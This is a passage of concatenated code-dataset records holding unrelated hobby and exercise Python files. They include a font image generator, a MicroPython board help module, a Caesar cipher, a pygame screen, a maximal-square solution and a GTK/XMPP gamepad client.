item[1]\n\tprint('\\t{', end='')\n\tfor j in data:\n\t\tprint('{}, '.format(hex(int(j))), end='')\n\tprint(\"}}, // {:02x} '{}'\".format(codePoint, chr(codePoint)))\nprint('};')\n\n\nsys.stderr.write(\"Code generation completed! Now generating image for the font (requires PIL)...\\n\")\nDOT_SIZE = 10\nDOT_MARGIN = 2\nimport PIL.Image, PIL.ImageDraw\nimport shutil\nimport os\n\nOUTPUT_DIR = './generated_images'\nif os.path.exists(OUTPUT_DIR):\n\tshutil.rmtree(OUTPUT_DIR)\nos.mkdir(OUTPUT_DIR)\nfor item in characterData:\n\tcodePoint = item[0]\n\tdata = item[1]\n\timg = PIL.Image.new( 'RGBA', (5*(DOT_SIZE+DOT_MARGIN),7*(DOT_SIZE+DOT_MARGIN)), \"white\")\n\tdraw = PIL.ImageDraw.Draw(img)\n\tfor index, row in enumerate(data):\n\t\ty = 0\n\t\twhile y <= 7:\n\t\t\tdraw.rectangle(\n\t\t\t\t(\n\t\t\t\t\t(DOT_MARGIN+index*(DOT_SIZE+DOT_MARGIN), DOT_MARGIN+y*(DOT_SIZE+DOT_MARGIN)),\n\t\t\t\t\t(DOT_MARGIN+index*(DOT_SIZE+DOT_MARGIN)+DOT_SIZE, DOT_MARGIN+y*(DOT_SIZE+DOT_MARGIN)+DOT_SIZE)\n\t\t\t\t),\n\t\t\t\t(0, 0, 0, 255) if row&(1<output_size:\n sent += gen.replace('▁', ' ')\n toked = self.tok(sent)\n count =0\n break\n sent += gen.replace('▁', ' ')\n toked = self.tok(sent)\n count += 1\n \n loc = 0\n sent = sent.replace('', '').replace('', '')\n conv = False\n for s in range(len(sent)) :\n if conv == False : \n if sent[s] == \"\\\"\" :\n conv = True\n elif sent[s] =='.' 
:\n loc = s\n else :\n if sent[s] == \"\\\"\" :\n conv = False\n loc = s\n \n \n if loc != 0 :\n sent = sent[:loc+1]\n \n print(\"time is \", time.time() - start)\n \n return sent","sub_path":"flask_server/TextGeneration/Module/StoryGenerator_photory.py","file_name":"StoryGenerator_photory.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"587677190","text":"#-----------------------\n# imports\n#-----------------------\n\nfrom micropython import const\n\n#-----------------------\n# funboard variables class\n#-----------------------\n\nclass BOARD:\n\n BOARD_NAME = 'FUNBOARD-V1'\n BOARD_DATE = '2021-01-06'\n\n # sdcard ref: https://docs.micropython.org/en/latest/library/machine.SDCard.html\n SDCARD_SLOT = const( 3) #\n PIN_SD_CS = const(27) # SDCard non-standard \n PIN_SD_SCL = const(14) # SDCard Slot 3\n PIN_SD_MOSI = const(13) # SDCard Slot 3\n PIN_SD_MISO = const(12) # SDCard Slot 3\n \n PIN_MANRST = const(15) # --> RESET\n PIN_LED = const(32) # Blue LED\n PIN_PIXELS = const( 4) # 8 Micro Pixels\n PIN_BUZZER = const( 2) # Buzzer\n PIN_PROG = const( 0) # PROG Button\n PIN_UART1_TX = const(17) # UART\n PIN_UART1_RX = const(16) # UART\n PIN_SPI2_CS = const( 5) # SPI-2\n PIN_SPI2_SCL = const(18) # SPI-2\n PIN_SPI2_MISO = const(19) # SPI-2\n PIN_SPI2_MOSI = const(23) # SPI-2\n PIN_I2C1_DATA = const(26) # I2C-1\n PIN_I2C1_CLK = const(25) # I2C-1\n\n helplines = '''\n\n key 1 funboard info, help, and variables\n funboard.info # version and name\n funboard.help # basic help\n funboard.show('module') # more detailed help \n dir(funboard) # lists a bunch of pins\n\n key 2 esp32 esp32 sensors, values, reset\n esp32.reset # hard reset\n esp32.temp # temperature C\n esp32.tempf # temperature F\n esp32.hall # read hall sensor\n esp32.memory # memory use\n esp32.flash # disk use\n\n key 3 beeper beep the buzzer\n beeper.beep() # beep\n beeper.beepn(count) # beep n times\n beeper.beep2(freq1,freq2) # a beep that changes freq\n beeper.play(notestring) # play a string of notes\n\n key 4 led control the blue led \n led.on()\n led.off()\n led.blink(count) # blink \"count\" times\n led.pwm(percent) # use pwm to dim the led\n led.pwm2(p1,p2) # change led from p1 to p2 \n\n key 5 pixels control the funboard micro pixels\n set: pixels.brightness = 32 # 0-255, set global\n pixels.off() # all off\n pixels.kill() # makes gpio pin an imput\n pixels.setp(pixel,color,brightness) # set a pixel 0-7\n pixels.set_brightness(32) # set global, adjust current\n pixels.sweep(color,brightness) # like KITT from Knight Rider\n\n key 6 sdcard SDcard mount, format, etc\n sdcard.mount() # mount sd card, runs on boot\n sdcard.unmount() # unmount sdcard to remove it\n sdcard.sdpath() # show path to sd card\n sdcard.format() # erase/format the sd card\n\n key 7 wifi connect to local wifi\n set: essid = \"my_essid\"\n set: password = \"my_password\"\n wifi.scan() # list available access points\n wifi.connect(essid,password) # or use set values\n wifi.disconnect()\n\n key 8 rtc real time clock functions\n rtc.ntp_set() # set time (after wifi connect)\n rtc.set(datetime_tuple) # manual set\n rtc.get() # get the rtc time\n rtc.linux_epoch() # seconds since jan 1 1970\n rtc.dtstamp() # datetime string\n\n key 9 eziot store data on the cloud\n set: eziot.api_key = \"my_account_key\"\n set: eziot.api_secret = \"my_account_secret\"\n set: eziot.api_version = 1.0\n eziot.stats()\n eziot.post_data(group,device,data1,data2,data3,data4)\n 
eziot.get_data(count,after,group,device)\n eziot.delete_data(rowids,before,xall)\n eziot.watch(startrows,update,group,device)\n\n key 10 st system tools for dirs, file, etc.\n st.tree() # print directory tree structure\n st.remove('filepath') # remove a file\n st.rmdir('dirpath') # remove a dir\n st.isfile('path')\n st.isdir('path')\n st.exists('path')\n st.abspath('path')\n st.mkdir('dirpath')\n st.pf('filepath') # print file to screen\n st.pp(object) # pretty print a dict, list, etc\n st.reload(module) # reload module\n st.du() # show disk usage\n st.memp() # clean memory and show usage percent\n st. ... # more functions, see the docs\n \n '''\n\n def __init__(self):\n\n # build help\n self.help1,self.help2 = [],{}\n self.helplines = self.helplines.split('\\n')\n key = ''\n for line in self.helplines:\n line = line.strip()\n if line:\n if line.startswith('key '):\n nada,order,key,desc = ([x.strip() for x in line.split(None,3)]+['','','',''])[:4]\n if order.isdigit():\n order = int(order)\n else:\n order = 1000\n self.help1.append((order,key,desc))\n self.help2[key] = [] \n else:\n self.help2[key].append(line)\n del self.helplines\n self.help1.sort()\n self.help1 = [(key,desc) for order,key,desc in self.help1]\n\n @property\n def info(self):\n print('{} {}'.format(self.BOARD_NAME,self.BOARD_DATE))\n\n @property\n def help(self):\n print('{} Extras:'.format(self.BOARD_NAME))\n width = max([len(key) for key,desc in self.help1])\n for key,desc in self.help1:\n key = key + ' '*max(0,width-len(key))\n if desc:\n print(' {} = {}'.format(key,desc))\n else:\n print(' {}'.format(key))\n\n def show(self,module=None):\n if module not in self.help2:\n print('Unknown MODULE: {}'.format(module))\n else:\n print('FunBoard MODULE: {}'.format(module))\n width = max([len(x.split('#')[0].strip()) for x in self.help2[module]])\n for line in self.help2[module]:\n funct,desc = [x.strip() for x in (line+'#').split('#')][:2]\n funct = funct + ' '*max(0,width-len(funct))\n if desc:\n print(' {} = {}'.format(funct,desc))\n else:\n print(' {}'.format(funct))\n print('Be sure to check the documentation for details!')\n print('GitLab: https://gitlab.com/duder1966/youtube-projects')\n\n def test(self):\n led.on()\n beeper.beep()\n pixels.sweep('red',ontime=100,offtime=100)\n st.tree()\n pixels.sweep('blue',ontime=100,offtime=100)\n wifi.scan()\n pixels.sweep('green',ontime=100,offtime=100)\n led.off()\n esp32.reset()\n\n\n#-----------------------\n# end\n#-----------------------\n","sub_path":"Dimension/FunBoard/v1/code/lib/funboard/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649070228","text":"#!/opt/pyenv/shims/python3\nimport sys\n\n#validate the argument count\nif(len(sys.argv) != 2):\n print(\"Usage: ./caesar \")\n exit(1)\n\n#validate the key\nkey = sys.argv[1]\nwhile True:\n try:\n intKey = int(key)\n if(intKey < 0):\n key = input(\"Please enter key equal to or greater than zero: \")\n else:\n validKey = int(key) % 26\n break\n except:\n key = input(\"Invalid; enter new key: \")\n\n#declare and get our input (did not validate for numbers)\nplaintext = input(\"plaintext: \")\nciphertext = \"\"\n\n\n#implement the formula\nfor letter in plaintext:\n if letter.isupper():\n ciphertext+=chr((((ord(letter)+intKey)-65)%26)+65)\n elif letter.islower():\n ciphertext+=chr((((ord(letter)+intKey)-97)%26)+97)\n else : ciphertext+=letter\n\nprint(f\"ciphertext: 
{ciphertext}\")","sub_path":"cs50/intro_comp_sci/pset6/caesar/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"41467605","text":"# Setup Python\r\nimport pygame, sys\r\n\r\n#Création de la page\r\nmainClock = pygame.time.Clock()\r\nfrom random import randint\r\nfrom pygame import *\r\npygame.init()\r\npygame.display.set_caption('RAP GAME')\r\nscreen = pygame.display.set_mode((1280, 720),0,32)\r\n\r\nessaie = pygame.image.load('essaie.png')\r\n\r\n#son = pygame.mixer.Sound(\"assets/menu.wav\")\r\n\r\nfont = pygame.font.SysFont(None, 50)\r\n\r\ndef text(text, font, color, surface, x, y):\r\n\ttextobj = font.render(text, 1, color)\r\n\ttextrect = textobj.get_rect()\r\n\ttextrect.topleft = (x, y)\r\n\tsurface.blit(textobj, textrect) \r\n\r\nclock = pygame.time.Clock()\r\n\r\nclick = False \r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef credits():\r\n\t\r\n\trunning = True\r\n\twhile True:\r\n\t\tscreen.blit(essaie, (0,0))\r\n\r\n\t\tclick = False\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == QUIT:\t\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tsys.exit()\r\n\t\t\tif event.type == KEYDOWN:\r\n\t\t\t\tif event.key == K_ESCAPE:\r\n\t\t\t\t\tpygame.quit()\r\n\t\t\t\t\tsys.exit()\r\n\t\t\t\t\tmenu()\r\n\t\t\tif event.type == MOUSEBUTTONDOWN:\r\n\t\t\t\tif event.button == 1:\r\n\t\t\t\t\tclick = True\r\n\t\tpygame.display.update()\r\n\t\tmainClock.tick(60)","sub_path":"credits.py","file_name":"credits.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87418428","text":"\n# Given a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\n\nclass Solution(object):\n def maximalSquare(self, matrix):\n if len(matrix) == 0:\n return\n area = 0\n sol = [[0 for i in range(len(matrix[0]))]for j in range(len(matrix))]\n for i in range(len(matrix)):\n sol[i][0] = int(matrix[i][0])\n if sol[i][0] == 1:\n area = 1\n for i in range(1,len(matrix[0])):\n sol[0][i] = int(matrix[0][i])\n if sol[0][1] == 1:\n area = 1\n for i in range(1,len(matrix)):\n for j in range(1,len(matrix[0])):\n if matrix[i][j] == '1':\n sol[i][j] = min(int(sol[i][j-1]),int(sol[i-1][j]),int(sol[i-1][j-1]))+1\n area = max(sol[i][j],area)\n else:\n sol[i][j] = 0\n return area * area\n\n\n\nif __name__ == '__main__':\n arr = [[\"0\",\"0\"],[\"0\",\"1\"]]\n solution = Solution()\n print(solution.maximalSquare(arr))","sub_path":"Maximal Square.py","file_name":"Maximal Square.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646911181","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GObject\nfrom inputs import get_gamepad\nimport threading\nimport sleekxmpp\nimport json\n\n\n\"\"\"\nGlobal Scope Variabeln\n\"\"\"\n\n#Zustand, in dem sich das Programm grad befindet\ndispMenu = True\nisConnected = False\ndispOverlay = False\nrolle = None\nconnectedTo = None\n\n#Gamepad Transmitter; globalisiert, weil von sehr unterschiedlichen Orten drauf zugegriffen werden muss; nicht ganz sicher, ob das nötig ist.\ngpInt = 0\ngpXMPP = None\n\n\"\"\"\nUitlity/Helfer-Funktionen\n\"\"\"\n\n#JSON validieren/Error Handling\ndef is_json(myjson):\n\ttry:\n\t\tjson_object = 
json.loads(myjson)\n\texcept ValueError:\n\t\treturn False\n\treturn True\n\n\n\"\"\"\nctrl XMPP Event Emitter\nhört auf den ctrl Chatroom,\nemittiert einen Event, wenn die receiver-Komponente der eigenen rolle entspricht\naufgeteilt auf Klasse, die verbindet und Verpackung, um connect()-Kollision zu vermeiden\n\"\"\"\nclass xmppBot(sleekxmpp.ClientXMPP):\n\n\tdef __init__(self, jid, password, room, nick):\n\n\t\t#Übergeordnete Klasse initialisieren\n\t\tprint(\"init Method started\")\n\t\tsleekxmpp.ClientXMPP.__init__(self, jid, password)\n\n\t\t#Instanz-Variablen festlegen\n\t\tself.room = room\n\t\tself.nick = nick\n\n\t\t#Event-Handler definieren\n\t\tself.add_event_handler(\"session_start\", self.start, threaded=False)\n\t\t#self.add_event_handler(\"groupchat_message\", self.message) #NOPE! Erst die Verpackungsklasse hängt diesen Event Handler an\n\n\t#Start-Methode: Verbindung etablieren\n\tdef start(self, event):\n\t\tself.send_presence()\n\t\tself.get_roster()\n\t\tself.plugin['xep_0045'].joinMUC(self.room, self.nick, wait=True)\n\t\tprint(\"Start Method finished\")\n\n\n#Verpackungsklasse, um alles mit einer Zeile starten zu können & connect()-Kollision umgehen\n#Erst diese Klasse hängt einen Event Handler an xmppBot, die selbst keinen für die Nachrichten hat; die Verpackungsklasse muss auf den Event reagieren, sonst connect()-Kollision\nclass xmppWrapper(GObject.GObject):\n\n\t__gsignals__ = {\n\t\t'relevantMsg': (GObject.SIGNAL_RUN_FIRST, None, (str,str,str,)),\n\t}\n\n\tdef __init__(self, jid, password, room, nick):\n\t\tGObject.GObject.__init__(self)\n\t\tself.ready = False\n\t\tself.room = room\n\t\tself.wrappedClient = xmppBot(jid, password, room, nick)\n\t\tself.wrappedClient.add_event_handler(\"groupchat_message\", self.message) #Hier wird der Event Handler an die xmppBot-Instanz gehängt\n\t\tself.wrappedClient.register_plugin('xep_0045') # Multi-User Chat\n\t\tself.wrappedClient.register_plugin('xep_0030') # Service Discovery\n\t\tself.wrappedClient.register_plugin('xep_0199') # XMPP Ping\n\t\tself.wrappedClient.connect()\n\t\tself.wrappedClient.process()\n\t\tself.ready = True\n\t\tprint(\"process executed\")\n\n\tdef message(self, msg):\n\t\tprint(\"Event listener groupmessage fired\")\n\t\tif is_json(msg[\"body\"]):\n\t\t\tdecodedMsg = json.loads(msg[\"body\"])\n\t\t\tif \"receiver\" in decodedMsg:\n\t\t\t\tif decodedMsg[\"receiver\"] == rolle:\n\t\t\t\t\tif \"sender\" in decodedMsg:\n\t\t\t\t\t\temitSender = decodedMsg[\"sender\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitSender = None\n\t\t\t\t\tif \"action\" in decodedMsg:\n\t\t\t\t\t\temitAction = decodedMsg[\"action\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitAction = None\n\t\t\t\t\tif \"value\" in decodedMsg:\n\t\t\t\t\t\temitValue = decodedMsg[\"value\"]\n\t\t\t\t\telse:\n\t\t\t\t\t\temitValue = None\n\t\t\t\t\tself.emit(\"relevantMsg\", emitSender, emitAction, emitValue)\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\tdef send(self, msg):\n\t\tself.wrappedClient.send_message(mto=self.room, mbody=msg, mtype=\"groupchat\")\n\n\n\t#Beenden-Methode\n\tdef cutConnection(self):\n\t\tself.wrappedClient.disconnect()\n\n\n\n\"\"\"\nGamepad Event Emitter\n\"\"\"\nclass gpEventEmitter(GObject.GObject):\n\n\t__gsignals__ = {\n\t\t'relevantButton': (GObject.SIGNAL_RUN_FIRST, None, (str,)),\n\t}\n\n\n\tdef __init__(self):\n\t\tGObject.GObject.__init__(self)\n\n\n\tdef startListening(self):\n\t\twhile 1:\n\t\t\tevents = get_gamepad()\n\t\t\tfor event in events:\n\n\t\t\t\t# Event emitter für Client Menu Führung\n\t\t\t\tif dispMenu:\n\t\t\t\t\tif 
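The `message` handler above only emits a signal when the JSON body is addressed to the client's own `rolle`; that routing can be exercised without XMPP or GObject. A stdlib-only sketch: the field names mirror the handler, the sample payloads are invented:

```python
import json

# Mirrors xmppWrapper.message: accept only JSON bodies addressed to `role`
# and pull out sender/action/value with None defaults.
def route_message(body, role):
    try:
        msg = json.loads(body)
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("receiver") != role:
        return None
    return msg.get("sender"), msg.get("action"), msg.get("value")

print(route_message('{"receiver": "client0", "sender": "cyborg1", "action": "connect"}', "client0"))
# ('cyborg1', 'connect', None)
print(route_message('not json', "client0"))  # None
```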
event.ev_type == \"Key\" and event.code == \"BTN_BASE4\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"start\") #Signal, das abgefeuert wird + die Argumente, die es mitliefern muss\n\t\t\t\t\telif event.ev_type == \"Absolute\" and event.code == \"ABS_Y\":\n\t\t\t\t\t\tif event.state < 100:\n\t\t\t\t\t\t\tself.emit(\"relevantButton\", \"up\")\n\t\t\t\t\t\telif event.state > 200:\n\t\t\t\t\t\t\tself.emit(\"relevantButton\", \"down\")\n\n\t\t\t\t# Event emitter für Client Interface\n\t\t\t\telif not dispMenu:\n\n\t\t\t\t\t#Gamepad-Zustand an Cyborg senden - falls nötig\n\t\t\t\t\tif isConnected and not dispOverlay and gpXMPP is not None:\n\n\t\t\t\t\t\tif gpXMPP.ready:\n\t\t\t\t\t\t\tglobal gpInt\n\t\t\t\t\t\t\tbuttonList = [\"BTN_TRIGGER\", \"BTN_THUMB\",\"BTN_THUMB2\",\"BTN_TOP\"]\n\t\t\t\t\t\t\taxesList = [\"ABS_X\", \"ABS_Y\"]\n\t\t\t\t\t\t\tbuttonCounter = 0\n\t\t\t\t\t\t\trelevantChanges = 0\n\n\t\t\t\t\t\t\t#Alle Buttons durchschleifen\n\t\t\t\t\t\t\tfor eachButton in buttonList:\n\t\t\t\t\t\t\t\tif event.ev_type == \"Key\" and event.code == eachButton:\n\t\t\t\t\t\t\t\t\trelevantChanges += 1\n\t\t\t\t\t\t\t\t\tif event.state == 1 and gpInt & 2**buttonCounter == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif gpInt & 2**buttonCounter > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**buttonCounter\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\tbuttonCounter += 1\n\n\t\t\t\t\t\t\t#Alle Achsen durchschleifen\n\t\t\t\t\t\t\tfor eachAxe in axesList:\n\t\t\t\t\t\t\t\tif event.ev_type == \"Absolute\" and event.code == eachAxe:\n\t\t\t\t\t\t\t\t\trelevantChanges += 1\n\t\t\t\t\t\t\t\t\tif event.state < 100 and gpInt & 2**buttonCounter == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif event.state > 200 and gpInt & 2**(buttonCounter + 1) == 0:\n\t\t\t\t\t\t\t\t\t\tgpInt += 2**(buttonCounter + 1)\n\t\t\t\t\t\t\t\t\telif gpInt & (2**buttonCounter) > 0 and gpInt & 2**buttonCounter > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**buttonCounter\n\t\t\t\t\t\t\t\t\telif gpInt & (2**(buttonCounter + 1)) > 0 and gpInt & 2**(buttonCounter + 1) > 0:\n\t\t\t\t\t\t\t\t\t\tgpInt -= 2**(buttonCounter + 1)\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\t\tbuttonCounter += 2\n\n\t\t\t\t\t\t\t#Nachricht bauen und senden\n\t\t\t\t\t\t\tif relevantChanges > 0:\n\t\t\t\t\t\t\t\tgpMsg = {}\n\t\t\t\t\t\t\t\tgpMsg[\"sender\"] = rolle\n\t\t\t\t\t\t\t\tgpMsg[\"receiver\"] = connectedTo\n\t\t\t\t\t\t\t\tgpMsg[\"action\"] = \"gamepad\"\n\t\t\t\t\t\t\t\tgpMsg[\"value\"] = gpInt\n\t\t\t\t\t\t\t\tgpXMPP.send(json.dumps(gpMsg))\n\n\n\t\t\t\t\t# Overlay triggern\n\t\t\t\t\tif not dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_BASE4\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"start\")\n\t\t\t\t\t# Zurück zum Menu\n\t\t\t\t\telif dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_THUMB\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"rot\")\n\t\t\t\t\t# Overlay wieder verstecken\n\t\t\t\t\telif dispOverlay and event.ev_type == \"Key\" and event.code == \"BTN_TOP\" and event.state == 1:\n\t\t\t\t\t\tself.emit(\"relevantButton\", \"grun\")\n\n\n\n\"\"\"\nDie GTK-Klasse, die das effektive Fenster zeichnet und an der alle Event Listeners hängen\n\"\"\"\nclass ButtonWindow(Gtk.Window):\n\n\tdef __init__(self):\n\n\t\t\"\"\"\n\t\tZuerst die graphischen Dinge, die Fenster und Bedienelemente werden gezeichnet\n\t\t\"\"\"\n\n\t\t#Konfiguration der Klasse\n\t\tself.anzClients 
= 2 #Wieviele Clients gibt's, wieviele Buttons werden gezeichnet\n\n\t\t#übergeordnete Klasse (GTK) wird initialisiert\n\t\tGtk.Window.__init__(self, title=\"Button Demo\")\n\n\t\t#GTK global\n\t\tself.set_border_width(10)\n\t\tself.menubox = Gtk.Box(spacing=6)\n\t\tself.add(self.menubox)\n\n\t\t#GTK für die Client-Menuführung\n\t\tself.btnList = [] #Hierrein werden die Button-Objekte gespeichert\n\t\tself.selectedButton = -1 #Speicher, welcher Button im Moment durch das Gamepad selektioniert wurde\n\t\tfor nBtn in range(0, self.anzClients): #Für jeden Client einen Button zeichnen und in btnList speichern\n\t\t\tself.btnList.append(Gtk.Button(\"Client %d\" % (nBtn + 1))) #Text draufschreiben\n\t\t\tself.btnList[nBtn].connect(\"clicked\", self.dispIF, \"client%d\" % nBtn) #Event Listener/auszuführende Funktion anhängen\n\t\t\tself.menubox.pack_start(self.btnList[nBtn], True, True, 0) #Keine Ahnung, was das macht\n\n\t\t#GTK für das Client-Interface\n\t\tself.ifTestLabel = Gtk.Label(\"Hier VLC imaginieren\")\n\t\tself.ifOverlay = Gtk.Label(\"Wirklich beenden? rot: JA! // grün: NEIN!\")\n\t\tself.menubox.pack_start(self.ifTestLabel, True, True, 0)\n\t\tself.menubox.pack_start(self.ifOverlay, True, True, 0)\n\n\t\t\"\"\"\n\t\tAlle Event Listeners werden definiert und an die GTK-Instanz gehängt\n\t\tWo nötig werden eigene Threads für die Event Emitter gestartet\n\t\t\"\"\"\n\n\t\t#XMPP-Listener für ctrl-Room, an GTK hängen\n\t\tself.ctrlXMPP = xmppWrapper(\"ice@ice.midi.xyz\", \"me_like!\", \"ctrl@conference.ice.midi.xyz\", \"ice\")\n\t\tself.ctrlXMPP.connect(\"relevantMsg\", self.ctrlDetected)\n\n\t\t#Gamepad-Listener an GTK anhängen\n\t\tgpListener = gpEventEmitter()\n\t\tgpListener.connect(\"relevantButton\", self.buttonDetected) #Event Listener anhängen: Signal-Name, Callback -> die Argumente, die dem Callback übergeben werden, sind definiert durch die emit-Funktion\n\t\tgpThread = threading.Thread(target=gpListener.startListening, args=()) #Aus der Methode, die den Loop enthält, wird ein Thread gemacht\n\t\tgpThread.start() #Der Thread/Loop wird gestartet\n\n\n\t\"\"\"\n\tctrl XMPP Callback\n\t\"\"\"\n\tdef ctrlDetected(self, data1, sender, action, value):\n\t\tprint(\"Message detected\")\n\t\tprint(\"I'll have to %s\" %action)\n\n\t\t#Verbindung zu einem Cyborg herstellen\n\t\tif action == \"connect\":\n\t\t\tself.connectCyborg(sender)\n\n\t\t#Cyborg will die Verbindung beenden\n\t\tif action == \"disconnect\":\n\t\t\tself.disconnectCyborg(setResponse=False)\n\n\n\t\"\"\"\n\tGamepad Listener Callback, an GTK angehänt\n\t\"\"\"\n\tdef buttonDetected(self, data1, data2):\n\t\tprint(\"button detected!\")\n\t\tprint(data2)\n\n\t\tif dispMenu:\n\t\t\tif data2 == \"down\":\n\t\t\t\tif self.selectedButton < self.anzClients - 1:\n\t\t\t\t\tself.selectedButton += 1\n\t\t\t\tself.markBtn(self.selectedButton)\n\t\t\telif data2 == \"up\":\n\t\t\t\tif self.selectedButton > 0:\n\t\t\t\t\tself.selectedButton -= 1\n\t\t\t\tself.markBtn(self.selectedButton)\n\t\t\telif data2 == \"start\" and self.selectedButton >= 0:\n\t\t\t\tself.dispIF(None, \"client%d\" % self.selectedButton) #erstes Argument None, weil beim Gamepad kein GTK-Button gedrückt wurde, dieser jedoch aufgrund des Button-Eventlisteners ein Parameter ist\n\n\t\telif not dispMenu:\n\t\t\tif data2 == \"start\" and not dispOverlay:\n\t\t\t\tself.dispOverlay(True)\n\t\t\telif data2 == \"grun\" and dispOverlay:\n\t\t\t\tself.dispOverlay(False)\n\t\t\telif data2 == \"rot\" and dispOverlay:\n\t\t\t\tself.dispMenu()\n\n\n\t\"\"\"\n\tVerbindung zu 
Cyborgs herstellen oder abbrechen\n\t\"\"\"\n\n\tdef connectCyborg(self, cyborg):\n\t\tglobal gpXMPP, isConnected, connectedTo\n\t\txmppResponse = {}\n\t\t#Es steht schon eine Verbindung, keine neue herstellen\n\t\tif isConnected:\n\t\t\txmppResponse[\"action\"] = \"stillConnected\"\n\t\t\txmppResponse[\"value\"] = connectedTo\n\t\t#Es steht noch keine Verbindung, herstellen!\n\t\telse:\n\t\t\t#Neuer Room für Gamepad-Chat\n\t\t\tgpXMPP = xmppWrapper(\"ice@ice.midi.xyz\", \"me_like!\", \"%s@conference.ice.midi.xyz\" % rolle, \"ice\")\n\t\t\t#Auf XMPP-Verbindung warten\n\t\t\twhile not gpXMPP.ready:\n\t\t\t\tpass\n\t\t\t#globale Variabeln anpassen\n\t\t\tisConnected = True\n\t\t\tconnectedTo = cyborg\n\t\t\t#TODO: VLC-Streams hier aufbauen\n\t\t\t#TODO: irgendeine GTK-Feedback-Message einbauen\n\t\t\t#Ready-Mitteilung an Cyborg\n\t\t\txmppResponse[\"action\"] = \"ready\"\n\t\t#Rückmeldung abschicken\n\t\txmppResponse[\"sender\"] = rolle\n\t\txmppResponse[\"receiver\"] = cyborg\n\t\tself.ctrlXMPP.send(json.dumps(xmppResponse))\n\n\n\tdef disconnectCyborg(self, setResponse):\n\t\tglobal gpXMPP, isConnected, connectedTo\n\t\tif setResponse:\n\t\t\txmppResponse = {}\n\t\t\txmppResponse[\"sender\"] = rolle\n\t\t\txmppResponse[\"receiver\"] = connectedTo\n\t\t\txmppResponse[\"action\"] = \"disconnect\"\n\t\t\tself.ctrlXMPP.send(json.dumps(xmppResponse))\n\t\tif gpXMPP is not None:\n\t\t\tgpXMPP.cutConnection()\n\t\t\tgpXMPP = None\n\t\t#TODO: VLC-Streams hier abbrechen\n\t\t#TODO: irgendein Feedback\n\t\tisConnected = False\n\t\tconnectedTo = None\n\n\n\t\"\"\"\n\tGrafische Funktionen, Steuerung der Menuführung\n\t\"\"\"\n\t#Das Markieren der Buttons. CSS-Klassen entfernen und anhängen, nur optisch für Menuführung relevant\n\tdef markBtn(self, whichBtn):\n\t\tfor btn in self.btnList:\n\t\t\tctx = btn.get_style_context()\n\t\t\tctx.remove_class(\"marked\")\n\t\tctx = self.btnList[whichBtn].get_style_context()\n\t\tctx.add_class(\"marked\")\n\n\n\t#Client Interface ausblenden, Menu anzeigen, Verbindung abbrechen\n\tdef dispMenu(self):\n\t\tglobal rolle, dispMenu, dispOverlay\n\t\tself.disconnectCyborg(setResponse=True)\n\t\t#globale Variabeln umdefinieren\n\t\trolle = None\n\t\tdispMenu = True\n\t\tdispOverlay = False\n\t\tself.ifTestLabel.hide()\n\t\tself.ifOverlay.hide()\n\t\tfor btn in self.btnList:\n\t\t\tbtn.show()\n\n\n\t#Menu ausblenden, Client Interface anzeigen\n\tdef dispIF(self, button, setRolle):\n\t\tglobal rolle, dispMenu\n\t\trolle = setRolle\n\t\tprint(\"Rolle gewählt: %s\" % rolle)\n\t\tdispMenu = False\n\t\tfor btn in self.btnList:\n\t\t\tbtn.hide()\n\t\tself.ifTestLabel.show()\n\n\n\t#Quit Overlay anzeigen\n\tdef dispOverlay(self, setOverlay):\n\t\tglobal dispOverlay\n\t\tif setOverlay:\n\t\t\tdispOverlay = True\n\t\t\tself.ifOverlay.show()\n\t\telse:\n\t\t\tdispOverlay = False\n\t\t\tself.ifOverlay.hide()\n\n\n\tdef on_close_clicked(self, button):\n\t\tself.disconnectCyborg(setResponse=True)\n\t\tprint(\"Closing application\")\n\t\tGtk.main_quit()\n\n\n\n\"\"\"\nCSS-File integrieren\n\"\"\"\ncssProvider = Gtk.CssProvider()\ncssProvider.load_from_path('interfaceCSS.css')\nscreen = Gdk.Screen.get_default()\nstyleContext = Gtk.StyleContext()\nstyleContext.add_provider_for_screen(screen, cssProvider, Gtk.STYLE_PROVIDER_PRIORITY_USER)\n\n\n\"\"\"\nGTK-Applikation starten\n\"\"\"\nwin = ButtonWindow()\nwin.connect(\"delete-event\", 
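`connectCyborg` answers a connect request with `stillConnected` when a pairing already exists and `ready` once a new one is set up. That decision can be isolated as a pure function; the field names follow the messages built above, everything else is illustrative:

```python
import json

# The JSON reply a client owes a cyborg that asked to connect.
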